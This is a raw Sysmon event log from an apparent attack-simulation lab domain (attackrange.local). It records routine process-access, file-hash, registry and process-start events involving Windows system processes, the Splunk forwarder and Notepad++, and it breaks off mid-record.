Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001056383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.170{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001056382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.108{5EBD8912-8CC0-6151-1600-00000000FD01}12961412C:\Windows\system32\svchost.exe{5EBD8912-8D66-6151-AB00-00000000FD01}5876C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.108{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D66-6151-AB00-00000000FD01}5876C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D66-6151-AB00-00000000FD01}5876C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981091Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:48.321{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0B3FC3E68C6D34B0343F7A63FCCA68C,SHA256=A65D548096B99EE34FB6A1E79295584352E16FE7E8963F00147C6BA59F0DAC9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.921{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E70595016552616C1237DE8CB69B72C6,SHA256=A68A00AE7B227F7F5F5C577CA33A42CF5DA7FC441FE06646D1D112657596F1A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.921{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=91C9E2C3A9C05640CCB13E01A60E6502,SHA256=0F46C26A45D0D9D6B8995D015DF003431091A2A96B8320BFA513185FBBEC4F8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.889{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.889{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.889{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.811{5EBD8912-8CC0-6151-1200-00000000FD01}4844784C:\Windows\System32\svchost.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001056459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localInvDBSetValue2021-09-27 09:22:48.811{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Notepad++\notepad++.exeBinary Data 10341000x80000000000000001056458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.796{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.796{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.796{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.796{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.780{5EBD8912-8D2A-6151-9600-00000000FD01}46325808C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.780{5EBD8912-8D2A-6151-9600-00000000FD01}46325808C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.764{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.764{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.764{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.764{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.764{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.764{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.764{5EBD8912-8D2A-6151-9600-00000000FD01}46325228C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\windows.storage.dll+10932|C:\Windows\System32\windows.storage.dll+10629|C:\Windows\System32\windows.storage.dll+104ff|C:\Windows\System32\SHELL32.dll+80257|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+17429f 154100x80000000000000001056443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.691{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe8.14Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program 